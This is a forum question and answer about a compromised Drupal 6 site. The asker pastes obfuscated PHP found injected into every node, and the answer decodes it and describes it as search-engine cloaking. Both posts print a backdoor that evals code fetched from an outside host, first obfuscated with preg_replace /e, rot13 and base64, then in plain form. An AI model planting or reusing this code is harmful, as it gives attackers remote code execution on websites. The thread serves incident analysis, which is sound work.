SQL PHP injection attack in Drupal 6

Question

Today, all the nodes in my drupal 6 site appeared with this added php script

 ?php $node->nid = 849;
     preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');

    if(@$node->body):
    ?php echo @$node->title;?
    ?php echo @$node->body;?
    ?php else:?

    ... here would go the original text of the node

    ?php endif;?

(I´ve removed some symbols to make sure you can correctly read the php code)

So, I guess this means that somebody was able to update the information in the drupal tables and inject this php script.

1 - What is this PHP code doing (if anything)? (of course apart from preventing the visualization of the node content)
2 - Any idea of how did they manage to do this? Is a Drupal security leak? a Mysql one? 3 - I guess the only way to reinstaurate this is by completely restoring the database...

Answer 1

The guy that made this, has really tried to make the code hard to read.

I'm not 100% sure how exactly this works, but the end result of the top line is something like this:

if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php'));
if(function_exists('node_update_log'))node_update_log($node);

Whoever made this targeted your site because it's a Drupal site, are you runnning up to date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using php filters in your Drupal nodes, this could be the access point.

I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content for the search engine crawlers by looking at the IP address. That is a SEO strategy known as clocking.

Anyways the link to the actual code that is run:

In short this attack on your site, was meant to hide the fact that search engine would index some special contents on your site. This is probably made to boost SEO for some site. The one who made this really know what he wanted to do and how to do it.